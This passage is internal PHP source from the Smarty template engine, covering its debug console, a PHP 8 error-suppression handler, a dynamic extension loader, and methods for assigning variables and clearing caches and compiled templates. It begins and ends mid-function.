        // init properties by hand as user may have edited the original Smarty class
        $debObj->setPluginsDir(is_dir(__DIR__ . '/../plugins') ? __DIR__ .
                                                                           '/../plugins' : $smarty->getPluginsDir());
        $debObj->force_compile = false;
        $debObj->compile_check = Smarty::COMPILECHECK_ON;
        $debObj->left_delimiter = '{';
        $debObj->right_delimiter = '}';
        $debObj->security_policy = null;
        $debObj->debugging = false;
        $debObj->debugging_ctrl = 'NONE';
        $debObj->error_reporting = E_ALL & ~E_NOTICE;
        $debObj->debug_tpl =
            isset($smarty->debug_tpl) ? $smarty->debug_tpl : 'file:' . __DIR__ . '/../debug.tpl';
        $debObj->registered_plugins = array();
        $debObj->registered_resources = array();
        $debObj->registered_filters = array();
        $debObj->autoload_filters = array();
        $debObj->default_modifiers = array();
        $debObj->escape_html = true;
        $debObj->caching = Smarty::CACHING_OFF;
        $debObj->compile_id = null;
        $debObj->cache_id = null;
        // prepare information of assigned variables
        $ptr = $this->get_debug_vars($obj);
        $_assigned_vars = $ptr->tpl_vars;
        ksort($_assigned_vars);
        $_config_vars = $ptr->config_vars;
        ksort($_config_vars);
        $debugging = $smarty->debugging;
        $templateName = $obj->source->type . ':' . $obj->source->name;
        $displayMode = $debugging === 2 || !$full;
        $offset = $this->offset * 50;
        $_template = new Smarty_Internal_Template($debObj->debug_tpl, $debObj);
        if ($obj->_isTplObj()) {
            $_template->assign('template_name', $templateName);
        }
        if ($obj->_objType === 1 || $full) {
            $_template->assign('template_data', $this->template_data[ $this->index ]);
        } else {
            $_template->assign('template_data', null);
        }
        $_template->assign('assigned_vars', $_assigned_vars);
        $_template->assign('config_vars', $_config_vars);
        $_template->assign('execution_time', microtime(true) - $smarty->start_time);
        $_template->assign('targetWindow', $displayMode ? md5("$offset$templateName") : '__Smarty__');
        $_template->assign('offset', $offset);
        echo $_template->fetch();
        if (isset($full)) {
            $this->index--;
        }
        if (!$full) {
            $this->index = $savedIndex;
        }
    }

    /**
     * Recursively gets variables from all template/data scopes
     *
     * @param Smarty_Internal_Template|Smarty_Data $obj object to debug
     *
     * @return StdClass
     */
    public function get_debug_vars($obj)
    {
        $config_vars = array();
        foreach ($obj->config_vars as $key => $var) {
            $config_vars[ $key ][ 'value' ] = $var;
            if ($obj->_isTplObj()) {
                $config_vars[ $key ][ 'scope' ] = $obj->source->type . ':' . $obj->source->name;
            } elseif ($obj->_isDataObj()) {
                $tpl_vars[ $key ][ 'scope' ] = $obj->dataObjectName;
            } else {
                $config_vars[ $key ][ 'scope' ] = 'Smarty object';
            }
        }
        $tpl_vars = array();
        foreach ($obj->tpl_vars as $key => $var) {
            foreach ($var as $varkey => $varvalue) {
                if ($varkey === 'value') {
                    $tpl_vars[ $key ][ $varkey ] = $varvalue;
                } else {
                    if ($varkey === 'nocache') {
                        if ($varvalue === true) {
                            $tpl_vars[ $key ][ $varkey ] = $varvalue;
                        }
                    } else {
                        if ($varkey !== 'scope' || $varvalue !== 0) {
                            $tpl_vars[ $key ][ 'attributes' ][ $varkey ] = $varvalue;
                        }
                    }
                }
            }
            if ($obj->_isTplObj()) {
                $tpl_vars[ $key ][ 'scope' ] = $obj->source->type . ':' . $obj->source->name;
            } elseif ($obj->_isDataObj()) {
                $tpl_vars[ $key ][ 'scope' ] = $obj->dataObjectName;
            } else {
                $tpl_vars[ $key ][ 'scope' ] = 'Smarty object';
            }
        }
        if (isset($obj->parent)) {
            $parent = $this->get_debug_vars($obj->parent);
            foreach ($parent->tpl_vars as $name => $pvar) {
                if (isset($tpl_vars[ $name ]) && $tpl_vars[ $name ][ 'value' ] === $pvar[ 'value' ]) {
                    $tpl_vars[ $name ][ 'scope' ] = $pvar[ 'scope' ];
                }
            }
            $tpl_vars = array_merge($parent->tpl_vars, $tpl_vars);
            foreach ($parent->config_vars as $name => $pvar) {
                if (isset($config_vars[ $name ]) && $config_vars[ $name ][ 'value' ] === $pvar[ 'value' ]) {
                    $config_vars[ $name ][ 'scope' ] = $pvar[ 'scope' ];
                }
            }
            $config_vars = array_merge($parent->config_vars, $config_vars);
        } else {
            foreach (Smarty::$global_tpl_vars as $key => $var) {
                if (!array_key_exists($key, $tpl_vars)) {
                    foreach ($var as $varkey => $varvalue) {
                        if ($varkey === 'value') {
                            $tpl_vars[ $key ][ $varkey ] = $varvalue;
                        } else {
                            if ($varkey === 'nocache') {
                                if ($varvalue === true) {
                                    $tpl_vars[ $key ][ $varkey ] = $varvalue;
                                }
                            } else {
                                if ($varkey !== 'scope' || $varvalue !== 0) {
                                    $tpl_vars[ $key ][ 'attributes' ][ $varkey ] = $varvalue;
                                }
                            }
                        }
                    }
                    $tpl_vars[ $key ][ 'scope' ] = 'Global';
                }
            }
        }
        return (object)array('tpl_vars' => $tpl_vars, 'config_vars' => $config_vars);
    }

    /**
     * Return key into $template_data for template
     *
     * @param \Smarty_Internal_Template $template template object
     *
     * @return string key into $template_data
     */
    private function get_key(Smarty_Internal_Template $template)
    {
        static $_is_stringy = array('string' => true, 'eval' => true);
        // calculate Uid if not already done
        if ($template->source->uid === '') {
            $template->source->filepath;
        }
        $key = $template->source->uid;
        if (isset($this->template_data[ $this->index ][ $key ])) {
            return $key;
        } else {
            if (isset($_is_stringy[ $template->source->type ])) {
                $this->template_data[ $this->index ][ $key ][ 'name' ] =
                    '\'' . substr($template->source->name, 0, 25) . '...\'';
            } else {
                $this->template_data[ $this->index ][ $key ][ 'name' ] = $template->source->filepath;
            }
            $this->template_data[ $this->index ][ $key ][ 'compile_time' ] = 0;
            $this->template_data[ $this->index ][ $key ][ 'render_time' ] = 0;
            $this->template_data[ $this->index ][ $key ][ 'cache_time' ] = 0;
            $this->template_data[ $this->index ][ $key ][ 'total_time' ] = 0;
            return $key;
        }
    }

    /**
     * Ignore template
     *
     * @param \Smarty_Internal_Template $template
     */
    public function ignore(Smarty_Internal_Template $template)
    {
        // calculate Uid if not already done
        if ($template->source->uid === '') {
            $template->source->filepath;
        }
        $this->ignore_uid[ $template->source->uid ] = true;
    }

    /**
     * handle 'URL' debugging mode
     *
     * @param Smarty $smarty
     */
    public function debugUrl(Smarty $smarty)
    {
        if (isset($_SERVER[ 'QUERY_STRING' ])) {
            $_query_string = $_SERVER[ 'QUERY_STRING' ];
        } else {
            $_query_string = '';
        }
        if (false !== strpos($_query_string, $smarty->smarty_debug_id)) {
            if (false !== strpos($_query_string, $smarty->smarty_debug_id . '=on')) {
                // enable debugging for this browser session
                setcookie('SMARTY_DEBUG', true);
                $smarty->debugging = true;
            } elseif (false !== strpos($_query_string, $smarty->smarty_debug_id . '=off')) {
                // disable debugging for this browser session
                setcookie('SMARTY_DEBUG', false);
                $smarty->debugging = false;
            } else {
                // enable debugging for this page
                $smarty->debugging = true;
            }
        } else {
            if (isset($_COOKIE[ 'SMARTY_DEBUG' ])) {
                $smarty->debugging = true;
            }
        }
    }
}
<?php

/**
 * Smarty error handler to fix new error levels in PHP8 for backwards compatibility
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Simon Wisselink
 *
 */
class Smarty_Internal_ErrorHandler
{

    /**
     * Allows {$foo} where foo is unset.
     * @var bool
     */
    public $allowUndefinedVars = true;

    /**
     * Allows {$foo->propName} where propName is undefined.
     * @var bool
     */
    public $allowUndefinedProperties = true;

    /**
     * Allows {$foo.bar} where bar is unset and {$foo.bar1.bar2} where either bar1 or bar2 is unset.
     * @var bool
     */
    public $allowUndefinedArrayKeys = true;

    /**
     * Allows {$foo->bar} where bar is not an object (e.g. null or false).
     * @var bool
     */
    public $allowDereferencingNonObjects = true;

    private $previousErrorHandler = null;

    /**
     * Enable error handler to intercept errors
     */
    public function activate() {
        /*
            Error muting is done because some people implemented custom error_handlers using
            https://php.net/set_error_handler and for some reason did not understand the following paragraph:

            It is important to remember that the standard PHP error handler is completely bypassed for the
            error types specified by error_types unless the callback function returns FALSE.
            error_reporting() settings will have no effect and your error handler will be called regardless -
            however you are still able to read the current value of error_reporting and act appropriately.
            Of particular note is that this value will be 0 if the statement that caused the error was
            prepended by the @ error-control operator.
        */
        $this->previousErrorHandler = set_error_handler([$this, 'handleError']);
    }

    /**
     * Disable error handler
     */
    public function deactivate() {
        restore_error_handler();
        $this->previousErrorHandler = null;
    }

    /**
     * Error Handler to mute expected messages
     *
     * @link https://php.net/set_error_handler
     *
     * @param integer $errno Error level
     * @param         $errstr
     * @param         $errfile
     * @param         $errline
     * @param         $errcontext
     *
     * @return bool
     */
    public function handleError($errno, $errstr, $errfile, $errline, $errcontext = [])
    {

        if ($this->allowUndefinedVars && preg_match(
                '/^(Attempt to read property "value" on null|Trying to get property (\'value\' )?of non-object)/',
                $errstr
            )) {
            return; // suppresses this error
        }

        if ($this->allowUndefinedProperties && preg_match(
                '/^(Undefined property)/',
                $errstr
            )) {
            return; // suppresses this error
        }

        if ($this->allowUndefinedArrayKeys && preg_match(
            '/^(Undefined index|Undefined array key|Trying to access array offset on)/',
            $errstr
        )) {
            return; // suppresses this error
        }

        if ($this->allowDereferencingNonObjects && preg_match(
                '/^Attempt to read property ".+?" on/',
                $errstr
            )) {
            return; // suppresses this error
        }

        // pass all other errors through to the previous error handler or to the default PHP error handler
        return $this->previousErrorHandler ?
            call_user_func($this->previousErrorHandler, $errno, $errstr, $errfile, $errline, $errcontext) : false;
    }
}
<?php

/**
 * Smarty Extension handler
 *
 * Load extensions dynamically
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 *
 * Runtime extensions
 * @property   Smarty_Internal_Runtime_CacheModify       $_cacheModify
 * @property   Smarty_Internal_Runtime_CacheResourceFile $_cacheResourceFile
 * @property   Smarty_Internal_Runtime_Capture           $_capture
 * @property   Smarty_Internal_Runtime_CodeFrame         $_codeFrame
 * @property   Smarty_Internal_Runtime_FilterHandler     $_filterHandler
 * @property   Smarty_Internal_Runtime_Foreach           $_foreach
 * @property   Smarty_Internal_Runtime_GetIncludePath    $_getIncludePath
 * @property   Smarty_Internal_Runtime_Make_Nocache      $_make_nocache
 * @property   Smarty_Internal_Runtime_UpdateCache       $_updateCache
 * @property   Smarty_Internal_Runtime_UpdateScope       $_updateScope
 * @property   Smarty_Internal_Runtime_TplFunction       $_tplFunction
 * @property   Smarty_Internal_Runtime_WriteFile         $_writeFile
 *
 * Method extensions
 * @property   Smarty_Internal_Method_GetTemplateVars    $getTemplateVars
 * @property   Smarty_Internal_Method_Append             $append
 * @property   Smarty_Internal_Method_AppendByRef        $appendByRef
 * @property   Smarty_Internal_Method_AssignGlobal       $assignGlobal
 * @property   Smarty_Internal_Method_AssignByRef        $assignByRef
 * @property   Smarty_Internal_Method_LoadFilter         $loadFilter
 * @property   Smarty_Internal_Method_LoadPlugin         $loadPlugin
 * @property   Smarty_Internal_Method_RegisterFilter     $registerFilter
 * @property   Smarty_Internal_Method_RegisterObject     $registerObject
 * @property   Smarty_Internal_Method_RegisterPlugin     $registerPlugin
 * @property   mixed|\Smarty_Template_Cached             configLoad
 */
#[\AllowDynamicProperties]
class Smarty_Internal_Extension_Handler
{
    public $objType = null;

    /**
     * Cache for property information from generic getter/setter
     * Preloaded with names which should not use with generic getter/setter
     *
     * @var array
     */
    private $_property_info     = array(
        'AutoloadFilters' => 0, 'DefaultModifiers' => 0, 'ConfigVars' => 0,
        'DebugTemplate'   => 0, 'RegisteredObject' => 0, 'StreamVariable' => 0,
        'TemplateVars'    => 0, 'Literals' => 'Literals',
    );//

    private $resolvedProperties = array();

    /**
     * Call external Method
     *
     * @param \Smarty_Internal_Data $data
     * @param string                $name external method names
     * @param array                 $args argument array
     *
     * @return mixed
     */
    public function _callExternalMethod(Smarty_Internal_Data $data, $name, $args)
    {
        /* @var Smarty $data ->smarty */
        $smarty = isset($data->smarty) ? $data->smarty : $data;
        if (!isset($smarty->ext->$name)) {
            if (preg_match('/^((set|get)|(.*?))([A-Z].*)$/', $name, $match)) {
                $basename = $this->upperCase($match[ 4 ]);
                if (!isset($smarty->ext->$basename) && isset($this->_property_info[ $basename ])
                    && is_string($this->_property_info[ $basename ])
                ) {
                    $class = 'Smarty_Internal_Method_' . $this->_property_info[ $basename ];
                    if (class_exists($class)) {
                        $classObj = new $class();
                        $methodes = get_class_methods($classObj);
                        foreach ($methodes as $method) {
                            $smarty->ext->$method = $classObj;
                        }
                    }
                }
                if (!empty($match[ 2 ]) && !isset($smarty->ext->$name)) {
                    $class = 'Smarty_Internal_Method_' . $this->upperCase($name);
                    if (!class_exists($class)) {
                        $objType = $data->_objType;
                        $propertyType = false;
                        if (!isset($this->resolvedProperties[ $match[ 0 ] ][ $objType ])) {
                            $property = $this->resolvedProperties['property'][$basename] ??
                                $this->resolvedProperties['property'][$basename] = smarty_strtolower_ascii(
                                join(
                                    '_',
                                    preg_split(
                                        '/([A-Z][^A-Z]*)/',
                                        $basename,
                                        -1,
                                        PREG_SPLIT_NO_EMPTY |
                                        PREG_SPLIT_DELIM_CAPTURE
                                    )
                                )
                            );
                            if ($property !== false) {
                                if (property_exists($data, $property)) {
                                    $propertyType = $this->resolvedProperties[ $match[ 0 ] ][ $objType ] = 1;
                                } elseif (property_exists($smarty, $property)) {
                                    $propertyType = $this->resolvedProperties[ $match[ 0 ] ][ $objType ] = 2;
                                } else {
                                    $this->resolvedProperties[ 'property' ][ $basename ] = $property = false;
                                }
                            }
                        } else {
                            $propertyType = $this->resolvedProperties[ $match[ 0 ] ][ $objType ];
                            $property = $this->resolvedProperties[ 'property' ][ $basename ];
                        }
                        if ($propertyType) {
                            $obj = $propertyType === 1 ? $data : $smarty;
                            if ($match[ 2 ] === 'get') {
                                return $obj->$property;
                            } elseif ($match[ 2 ] === 'set') {
                                return $obj->$property = $args[ 0 ];
                            }
                        }
                    }
                }
            }
        }
        $callback = array($smarty->ext->$name, $name);
        array_unshift($args, $data);
        if (isset($callback) && $callback[ 0 ]->objMap | $data->_objType) {
            return call_user_func_array($callback, $args);
        }
        return call_user_func_array(array(new Smarty_Internal_Undefined(), $name), $args);
    }

    /**
     * Make first character of name parts upper case
     *
     * @param string $name
     *
     * @return string
     */
    public function upperCase($name)
    {
        $_name = explode('_', $name);
        $_name = array_map('smarty_ucfirst_ascii', $_name);
        return implode('_', $_name);
    }

    /**
     * get extension object
     *
     * @param string $property_name property name
     *
     * @return mixed|Smarty_Template_Cached
     */
    public function __get($property_name)
    {
        // object properties of runtime template extensions will start with '_'
        if ($property_name[ 0 ] === '_') {
            $class = 'Smarty_Internal_Runtime' . $this->upperCase($property_name);
        } else {
            $class = 'Smarty_Internal_Method_' . $this->upperCase($property_name);
        }
        if (!class_exists($class)) {
            return $this->$property_name = new Smarty_Internal_Undefined($class);
        }
        return $this->$property_name = new $class();
    }

    /**
     * set extension property
     *
     * @param string $property_name property name
     * @param mixed  $value         value
     *
     */
    public function __set($property_name, $value)
    {
        $this->$property_name = $value;
    }

    /**
     * Call error handler for undefined method
     *
     * @param string $name unknown method-name
     * @param array  $args argument array
     *
     * @return mixed
     */
    public function __call($name, $args)
    {
        return call_user_func_array(array(new Smarty_Internal_Undefined(), $name), array($this));
    }
}
<?php

/**
 * Smarty Method AddAutoloadFilters
 *
 * Smarty::addAutoloadFilters() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_AddAutoloadFilters extends Smarty_Internal_Method_SetAutoloadFilters
{
    /**
     * Add autoload filters
     *
     * @api Smarty::setAutoloadFilters()
     *
     * @param \Smarty_Internal_TemplateBase|\Smarty_Internal_Template|\Smarty $obj
     * @param array                                                           $filters filters to load automatically
     * @param string                                                          $type    "pre", "output", … specify
     *                                                                                 the filter type to set.
     *                                                                                 Defaults to none treating
     *                                                                                 $filters' keys as the
     *                                                                                 appropriate types
     *
     * @return \Smarty|\Smarty_Internal_Template
     * @throws \SmartyException
     */
    public function addAutoloadFilters(Smarty_Internal_TemplateBase $obj, $filters, $type = null)
    {
        $smarty = $obj->_getSmartyObj();
        if ($type !== null) {
            $this->_checkFilterType($type);
            if (!empty($smarty->autoload_filters[ $type ])) {
                $smarty->autoload_filters[ $type ] = array_merge($smarty->autoload_filters[ $type ], (array)$filters);
            } else {
                $smarty->autoload_filters[ $type ] = (array)$filters;
            }
        } else {
            foreach ((array)$filters as $type => $value) {
                $this->_checkFilterType($type);
                if (!empty($smarty->autoload_filters[ $type ])) {
                    $smarty->autoload_filters[ $type ] =
                        array_merge($smarty->autoload_filters[ $type ], (array)$value);
                } else {
                    $smarty->autoload_filters[ $type ] = (array)$value;
                }
            }
        }
        return $obj;
    }
}
<?php

/**
 * Smarty Method AddDefaultModifiers
 *
 * Smarty::addDefaultModifiers() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_AddDefaultModifiers
{
    /**
     * Valid for Smarty and template object
     *
     * @var int
     */
    public $objMap = 3;

    /**
     * Add default modifiers
     *
     * @api Smarty::addDefaultModifiers()
     *
     * @param \Smarty_Internal_TemplateBase|\Smarty_Internal_Template|\Smarty $obj
     * @param array|string                                                    $modifiers modifier or list of modifiers
     *                                                                                   to add
     *
     * @return \Smarty|\Smarty_Internal_Template
     */
    public function addDefaultModifiers(Smarty_Internal_TemplateBase $obj, $modifiers)
    {
        $smarty = $obj->_getSmartyObj();
        if (is_array($modifiers)) {
            $smarty->default_modifiers = array_merge($smarty->default_modifiers, $modifiers);
        } else {
            $smarty->default_modifiers[] = $modifiers;
        }
        return $obj;
    }
}
<?php

/**
 * Smarty Method Append
 *
 * Smarty::append() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_Append
{
    /**
     * Valid for all objects
     *
     * @var int
     */
    public $objMap = 7;

    /**
     * appends values to template variables
     *
     * @api  Smarty::append()
     * @link https://www.smarty.net/docs/en/api.append.tpl
     *
     * @param \Smarty_Internal_Data|\Smarty_Internal_Template|\Smarty $data
     * @param array|string                                            $tpl_var the template variable name(s)
     * @param mixed                                                   $value   the value to append
     * @param bool                                                    $merge   flag if array elements shall be merged
     * @param bool                                                    $nocache if true any output of this variable will
     *                                                                         be not cached
     *
     * @return \Smarty_Internal_Data|\Smarty_Internal_Template|\Smarty
     */
    public function append(Smarty_Internal_Data $data, $tpl_var, $value = null, $merge = false, $nocache = false)
    {
        if (is_array($tpl_var)) {
            // $tpl_var is an array, ignore $value
            foreach ($tpl_var as $_key => $_val) {
                if ($_key !== '') {
                    $this->append($data, $_key, $_val, $merge, $nocache);
                }
            }
        } else {
            if ($tpl_var !== '' && isset($value)) {
                if (!isset($data->tpl_vars[ $tpl_var ])) {
                    $tpl_var_inst = $data->ext->getTemplateVars->_getVariable($data, $tpl_var, null, true, false);
                    if ($tpl_var_inst instanceof Smarty_Undefined_Variable) {
                        $data->tpl_vars[ $tpl_var ] = new Smarty_Variable(null, $nocache);
                    } else {
                        $data->tpl_vars[ $tpl_var ] = clone $tpl_var_inst;
                    }
                }
                if (!(is_array($data->tpl_vars[ $tpl_var ]->value)
                      || $data->tpl_vars[ $tpl_var ]->value instanceof ArrayAccess)
                ) {
                    settype($data->tpl_vars[ $tpl_var ]->value, 'array');
                }
                if ($merge && is_array($value)) {
                    foreach ($value as $_mkey => $_mval) {
                        $data->tpl_vars[ $tpl_var ]->value[ $_mkey ] = $_mval;
                    }
                } else {
                    $data->tpl_vars[ $tpl_var ]->value[] = $value;
                }
            }
            if ($data->_isTplObj() && $data->scope) {
                $data->ext->_updateScope->_updateScope($data, $tpl_var);
            }
        }
        return $data;
    }
}
<?php

/**
 * Smarty Method AppendByRef
 *
 * Smarty::appendByRef() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_AppendByRef
{
    /**
     * appends values to template variables by reference
     *
     * @api  Smarty::appendByRef()
     * @link https://www.smarty.net/docs/en/api.append.by.ref.tpl
     *
     * @param \Smarty_Internal_Data|\Smarty_Internal_Template|\Smarty $data
     * @param string                                                  $tpl_var the template variable name
     * @param mixed                                                   &$value  the referenced value to append
     * @param bool                                                    $merge   flag if array elements shall be merged
     *
     * @return \Smarty_Internal_Data|\Smarty_Internal_Template|\Smarty
     */
    public static function appendByRef(Smarty_Internal_Data $data, $tpl_var, &$value, $merge = false)
    {
        if ($tpl_var !== '' && isset($value)) {
            if (!isset($data->tpl_vars[ $tpl_var ])) {
                $data->tpl_vars[ $tpl_var ] = new Smarty_Variable();
            }
            if (!is_array($data->tpl_vars[ $tpl_var ]->value)) {
                settype($data->tpl_vars[ $tpl_var ]->value, 'array');
            }
            if ($merge && is_array($value)) {
                foreach ($value as $_key => $_val) {
                    $data->tpl_vars[ $tpl_var ]->value[ $_key ] = &$value[ $_key ];
                }
            } else {
                $data->tpl_vars[ $tpl_var ]->value[] = &$value;
            }
            if ($data->_isTplObj() && $data->scope) {
                $data->ext->_updateScope->_updateScope($data, $tpl_var);
            }
        }
        return $data;
    }
}
<?php

/**
 * Smarty Method AssignByRef
 *
 * Smarty::assignByRef() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_AssignByRef
{
    /**
     * assigns values to template variables by reference
     *
     * @param \Smarty_Internal_Data|\Smarty_Internal_Template|\Smarty $data
     * @param string                                                  $tpl_var the template variable name
     * @param                                                         $value
     * @param boolean                                                 $nocache if true any output of this variable will
     *                                                                         be not cached
     *
     * @return \Smarty_Internal_Data|\Smarty_Internal_Template|\Smarty
     */
    public function assignByRef(Smarty_Internal_Data $data, $tpl_var, &$value, $nocache)
    {
        if ($tpl_var !== '') {
            $data->tpl_vars[ $tpl_var ] = new Smarty_Variable(null, $nocache);
            $data->tpl_vars[ $tpl_var ]->value = &$value;
            if ($data->_isTplObj() && $data->scope) {
                $data->ext->_updateScope->_updateScope($data, $tpl_var);
            }
        }
        return $data;
    }
}
<?php

/**
 * Smarty Method AssignGlobal
 *
 * Smarty::assignGlobal() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_AssignGlobal
{
    /**
     * Valid for all objects
     *
     * @var int
     */
    public $objMap = 7;

    /**
     * assigns a global Smarty variable
     *
     * @param \Smarty_Internal_Data|\Smarty_Internal_Template|\Smarty $data
     * @param string                                                  $varName the global variable name
     * @param mixed                                                   $value   the value to assign
     * @param boolean                                                 $nocache if true any output of this variable will
     *                                                                         be not cached
     *
     * @return \Smarty_Internal_Data|\Smarty_Internal_Template|\Smarty
     */
    public function assignGlobal(Smarty_Internal_Data $data, $varName, $value = null, $nocache = false)
    {
        if ($varName !== '') {
            Smarty::$global_tpl_vars[ $varName ] = new Smarty_Variable($value, $nocache);
            $ptr = $data;
            while ($ptr->_isTplObj()) {
                $ptr->tpl_vars[ $varName ] = clone Smarty::$global_tpl_vars[ $varName ];
                $ptr = $ptr->parent;
            }
        }
        return $data;
    }
}
<?php

/**
 * Smarty Method ClearAllAssign
 *
 * Smarty::clearAllAssign() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_ClearAllAssign
{
    /**
     * Valid for all objects
     *
     * @var int
     */
    public $objMap = 7;

    /**
     * clear all the assigned template variables.
     *
     * @api  Smarty::clearAllAssign()
     * @link https://www.smarty.net/docs/en/api.clear.all.assign.tpl
     *
     * @param \Smarty_Internal_Data|\Smarty_Internal_Template|\Smarty $data
     *
     * @return \Smarty_Internal_Data|\Smarty_Internal_Template|\Smarty
     */
    public function clearAllAssign(Smarty_Internal_Data $data)
    {
        $data->tpl_vars = array();
        return $data;
    }
}
<?php

/**
 * Smarty Method ClearAllCache
 *
 * Smarty::clearAllCache() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_ClearAllCache
{
    /**
     * Valid for Smarty object
     *
     * @var int
     */
    public $objMap = 1;

    /**
     * Empty cache folder
     *
     * @api  Smarty::clearAllCache()
     * @link https://www.smarty.net/docs/en/api.clear.all.cache.tpl
     *
     * @param \Smarty $smarty
     * @param integer $exp_time expiration time
     * @param string  $type     resource type
     *
     * @return int number of cache files deleted
     * @throws \SmartyException
     */
    public function clearAllCache(Smarty $smarty, $exp_time = null, $type = null)
    {
        $smarty->_clearTemplateCache();
        // load cache resource and call clearAll
        $_cache_resource = Smarty_CacheResource::load($smarty, $type);
        return $_cache_resource->clearAll($smarty, $exp_time);
    }
}
<?php

/**
 * Smarty Method ClearAssign
 *
 * Smarty::clearAssign() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_ClearAssign
{
    /**
     * Valid for all objects
     *
     * @var int
     */
    public $objMap = 7;

    /**
     * clear the given assigned template variable(s).
     *
     * @api  Smarty::clearAssign()
     * @link https://www.smarty.net/docs/en/api.clear.assign.tpl
     *
     * @param \Smarty_Internal_Data|\Smarty_Internal_Template|\Smarty $data
     * @param string|array                                            $tpl_var the template variable(s) to clear
     *
     * @return \Smarty_Internal_Data|\Smarty_Internal_Template|\Smarty
     */
    public function clearAssign(Smarty_Internal_Data $data, $tpl_var)
    {
        if (is_array($tpl_var)) {
            foreach ($tpl_var as $curr_var) {
                unset($data->tpl_vars[ $curr_var ]);
            }
        } else {
            unset($data->tpl_vars[ $tpl_var ]);
        }
        return $data;
    }
}
<?php

/**
 * Smarty Method ClearCache
 *
 * Smarty::clearCache() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_ClearCache
{
    /**
     * Valid for Smarty object
     *
     * @var int
     */
    public $objMap = 1;

    /**
     * Empty cache for a specific template
     *
     * @api  Smarty::clearCache()
     * @link https://www.smarty.net/docs/en/api.clear.cache.tpl
     *
     * @param \Smarty $smarty
     * @param string  $template_name template name
     * @param string  $cache_id      cache id
     * @param string  $compile_id    compile id
     * @param integer $exp_time      expiration time
     * @param string  $type          resource type
     *
     * @return int number of cache files deleted
     * @throws \SmartyException
     */
    public function clearCache(
        Smarty $smarty,
        $template_name,
        $cache_id = null,
        $compile_id = null,
        $exp_time = null,
        $type = null
    ) {
        $smarty->_clearTemplateCache();
        // load cache resource and call clear
        $_cache_resource = Smarty_CacheResource::load($smarty, $type);
        return $_cache_resource->clear($smarty, $template_name, $cache_id, $compile_id, $exp_time);
    }
}
<?php

/**
 * Smarty Method ClearCompiledTemplate
 *
 * Smarty::clearCompiledTemplate() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_ClearCompiledTemplate
{
    /**
     * Valid for Smarty object
     *
     * @var int
     */
    public $objMap = 1;

    /**
     * Delete compiled template file
     *
     * @api  Smarty::clearCompiledTemplate()
     * @link https://www.smarty.net/docs/en/api.clear.compiled.template.tpl
     *
     * @param \Smarty $smarty
     * @param string  $resource_name template name
     * @param string  $compile_id    compile id
     * @param integer $exp_time      expiration time
     *
     * @return int number of template files deleted
     * @throws \SmartyException
     */
    public function clearCompiledTemplate(Smarty $smarty, $resource_name = null, $compile_id = null, $exp_time = null)
    {
        // clear template objects cache
        $smarty->_clearTemplateCache();
        $_compile_dir = $smarty->getCompileDir();
        if ($_compile_dir === '/') { //We should never want to delete this!
            return 0;
        }
        $_compile_id = isset($compile_id) ? preg_replace('![^\w]+!', '_', $compile_id) : null;
        $_dir_sep = $smarty->use_sub_dirs ? DIRECTORY_SEPARATOR : '^';
        if (isset($resource_name)) {
            $_save_stat = $smarty->caching;
            $smarty->caching = Smarty::CACHING_OFF;
            /* @var Smarty_Internal_Template $tpl */
            $tpl = $smarty->createTemplate($resource_name);
            $smarty->caching = $_save_stat;
            if (!$tpl->source->handler->uncompiled && !$tpl->source->handler->recompiled && $tpl->source->exists) {
                $_resource_part_1 = basename(str_replace('^', DIRECTORY_SEPARATOR, $tpl->compiled->filepath));
                $_resource_part_1_length = strlen($_resource_part_1);
            } else {
                return 0;
            }
            $_resource_part_2 = str_replace('.php', '.cache.php', $_resource_part_1);
            $_resource_part_2_length = strlen($_resource_part_2);
        }
        $_dir = $_compile_dir;
        if ($smarty->use_sub_dirs && isset($_compile_id)) {
            $_dir .= $_compile_id . $_dir_sep;
        }
        if (isset($_compile_id)) {
            $_compile_id_part = $_compile_dir . $_compile_id . $_dir_sep;
            $_compile_id_part_length = strlen($_compile_id_part);
        }
        $_count = 0;
        try {
            $_compileDirs = new RecursiveDirectoryIterator($_dir);
            // NOTE: UnexpectedValueException thrown for PHP >= 5.3
        } catch (Exception $e) {
            return 0;
        }
        $_compile = new RecursiveIteratorIterator($_compileDirs, RecursiveIteratorIterator::CHILD_FIRST);
        foreach ($_compile as $_file) {
            if (substr(basename($_file->getPathname()), 0, 1) === '.') {
                continue;
            }
            $_filepath = (string)$_file;
            if ($_file->isDir()) {
                if (!$_compile->isDot()) {
                    // delete folder if empty
                    @rmdir($_file->getPathname());
                }
            } else {
                // delete only php files
                if (substr($_filepath, -4) !== '.php') {
                    continue;
                }
                $unlink = false;
                if ((!isset($_compile_id) ||
                     (isset($_filepath[ $_compile_id_part_length ]) &&
                      $a = !strncmp($_filepath, $_compile_id_part, $_compile_id_part_length)))
                    && (!isset($resource_name) || (isset($_filepath[ $_resource_part_1_length ])
                                                   && substr_compare(
                                                          $_filepath,
                                                          $_resource_part_1,
                                                          -$_resource_part_1_length,
                                                          $_resource_part_1_length
                                                      ) === 0) || (isset($_filepath[ $_resource_part_2_length ])
                                                                   && substr_compare(
                                                                          $_filepath,
                                                                          $_resource_part_2,
                                                                          -$_resource_part_2_length,
                                                                          $_resource_part_2_length
                                                                      ) === 0))
                ) {
                    if (isset($exp_time)) {
